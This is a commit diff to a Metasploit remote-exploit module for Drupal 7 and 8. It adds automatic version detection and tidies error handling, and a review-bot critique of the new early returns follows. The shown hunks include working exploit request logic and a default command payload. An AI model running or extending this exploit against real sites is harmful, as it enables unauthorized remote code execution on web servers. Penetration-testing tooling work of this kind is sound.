Add version detection and automatic targeting
I also refactored error handling. Should be cleaner now.
GSoC/Meterpreter_Web_Console
parent
86ffbc753e
commit
3d116d721d
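--- a/PATH-NOT-ON-PAGE
+++ b/PATH-NOT-ON-PAGE
@@ -44,6 +44,14 @@ class MetasploitModule < Msf::Exploit::Remote
 'Privileged' => false,
 # XXX: Using "x" in Gem::Version::new isn't technically appropriate
 'Targets' => [
+['Automatic (Unix In-Memory)',
+'Platform' => 'unix',
+'Arch' => ARCH_CMD
+],
+['Automatic (Linux Dropper)',
+'Platform' => 'linux',
+'Arch' => [ARCH_X86, ARCH_X64]
+],
 ['Drupal 7.x (Unix In-Memory)',
 'Platform' => 'unix',
 'Arch' => ARCH_CMD,
@@ -65,7 +73,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Version' => Gem::Version.new('8.x')
 ]
 ],
-'DefaultTarget' => 2, # Drupal 8.x (Unix In-Memory)
+'DefaultTarget' => 0, # Automatic (Unix In-Memory)
 'DefaultOptions' => {
 'PAYLOAD' => 'cmd/unix/generic',
 'CMD' => 'id; uname -a'
@@ -113,6 +121,15 @@ class MetasploitModule < Msf::Exploit::Remote
 vprint_status("Executing with #{func}(): #{cmd}")
 
 res = case target['Version'].to_s
+when '' # Automatic
+case detect_version.to_s
+when '7.x'
+print_good('Drupal 7 detected')
+exploit_drupal7(func, cmd)
+when '8.x'
+print_good('Drupal 8 detected')
+exploit_drupal8(func, cmd)
+end
 when '7.x'
 exploit_drupal7(func, cmd)
 when '8.x'
@@ -120,7 +137,7 @@ class MetasploitModule < Msf::Exploit::Remote
 end
 
 unless res && res.code == 200
-vprint_error("Unexpected final reply: #{res.inspect}")
+print_error("Unexpected reply: #{res.inspect}")
 return
 end
 
@@ -129,6 +146,35 @@ class MetasploitModule < Msf::Exploit::Remote
 res
 end
 
+def detect_version
+res = send_request_cgi(
+'method' => 'GET',
+'uri' => target_uri.path
+)
+
+return res unless res && res.code == 200
+
+case res.headers['X-Generator']
+when /Drupal 7/
+return Gem::Version.new('7.x')
+when /Drupal 8/
+return Gem::Version.new('8.x')
+end
+
+generator = res.get_html_document.at(
+'//meta[@name = "Generator"]/@content'
+)
+
+return res unless generator
+
+case generator.value
+when /Drupal 7/
+Gem::Version.new('7.x')
+when /Drupal 8/
+Gem::Version.new('8.x')
+end
+end
+
 def exploit_drupal7(func, code)
 vars_get = {
 'q' => 'user/password',
@@ -149,28 +195,20 @@ class MetasploitModule < Msf::Exploit::Remote
 'vars_post' => vars_post
 )
 
-unless res && res.code == 200
-vprint_error("Unexpected intermediate reply: #{res.inspect}")
-return
-end
+return res unless res && res.code == 200
 
 form_build_id = res.get_html_document.at(
 '//input[@name = "form_build_id"]/@value'
 )
 
-if form_build_id
-form_build_id = form_build_id.value
-else
-vprint_error("Unknown form_build_id: #{res.inspect}")
-return
-end
+return res unless form_build_id
 
 vars_get = {
-'q' => "file/ajax/name/#value/#{form_build_id}"
+'q' => "file/ajax/name/#value/#{form_build_id.value}"
 }
 
 vars_post = {
-'form_build_id' => form_build_id
+'form_build_id' => form_build_id.value
 }
 
 send_request_cgi(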
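Review bot: `return res unless form_build_id` in exploit_drupal7 hands the 200 response from the user/password GET back to the caller, whose only check (`unless res && res.code == 200`, in the hunk at -120,7) then treats a missing form_build_id as a successful run and carries on, where the removed `vprint_error("Unknown form_build_id: #{res.inspect}")` plus `return` had signalled the failure; either restore that message or return nil, `return unless form_build_id`, so the caller's check fails. detect_version has the same shape: `return res unless res && res.code == 200` and `return res unless generator` produce an object whose `.to_s` matches no `when` in the Automatic branch, so an unreachable host or one without an X-Generator header or Generator meta tag is reported only as `Unexpected reply: nil`. Using `return unless …` on both detect_version paths and adding an `else` with `print_error('Could not detect Drupal version; select a target manually')` to the inner `case detect_version.to_s` would name the actual cause. exploit_drupal7's body continues past the last hunk, and the method holding the `res = case target['Version'].to_s` dispatch starts before its hunk.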